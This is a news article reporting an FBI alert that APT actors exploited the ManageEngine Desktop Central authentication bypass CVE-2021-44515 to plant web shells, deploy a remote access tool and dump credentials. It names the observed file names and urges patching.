The FBI’s cyber division has issued an alert warning enterprises using Zoho-owned ManageEngine’s Desktop Central that advanced attackers have been exploiting a flaw to install malware since late October.
Zoho released a patch for an authentication bypass flaw CVE-2021-44515 on December 3, warning at the time that it had seen “indications of exploitation” and urged customers to update immediately.
Zoho didn’t provide further details of the attacks at the time, which occurred after activity this year targeting previously patched flaws in ManageEngine products that are tracked as CVE-2021-40539 and CVE-2021-44077. However, the FBI says in the new alert that advanced persistent threat (APT) actors have been exploiting CVE-2021-44515 since at least October 2021.
“Since at least late October 2021, APT actors have been actively exploiting a zero-day, now identified as CVE-2021-44515, on ManageEngine Desktop Central servers,” the FBI alert said.
Microsoft has previously attributed some of the earlier activity to a Chinese hacker group that was installing web shells on compromised servers to gain persistence on compromised servers. The flaws affected IT management products used by end-user organizations and managed service providers.
The FBI now says it observed APT actors compromising Desktop Central servers using the flaw, now known as CVE-2021-44515 to drop a webshell that overrides a legitimate function of Desktop Central.
The attackers then downloaded post-exploitation tools, enumerated domain users and groups, conducted network reconnaissance, attempted lateral movement across the network and dumped credentials.
ManageEngine is the enterprise IT management software division of Zoho, a company well known for its software-as-a-service products.
The flaw affects Desktop Central software for both enterprise customers and the version for managed service provider (MSP) customers.
The FBI has filled in some details about how attackers are abusing the flaw after obtaining samples that were downloaded from likely compromised ManageEngine ADSelfService Plus servers.
It has seen attackers upload two variants of web shells with the filenames emsaler.zip (variant 1, late October 2021), eco-inflect.jar (variant 1, mid November 2021) and aaa.zip (variant 2, late November 2021). The webshell overrides the legitimate Desktop Central application protocol interface servlet endpoint.
The webshell is also used for reconnaissance and domain enumeration. Eventually, the attackers install a remote access tool (RAT) for further intrusion, lateral movement, and credential dumping using the penetration testing tool Mimikatz, and LSASS process memory dumping.
The attackers also used the Windows authentication protocol WDigest to steal credentials through an LSASS dump, signaling the attackers were using so-called ‘living off the land’ legitimate tools for nefarious purposes.
Others tools in this category include Microsoft’s BITSAdmin command-line tool “to download a likely ShadowPad variant dropper with filename mscoree.dll, and a legitimate Microsoft AppLaunch binary, iop.exe”, according to the FBI.
ManageEngine has strongly advised customers to update their installations to the latest build as soon as possible.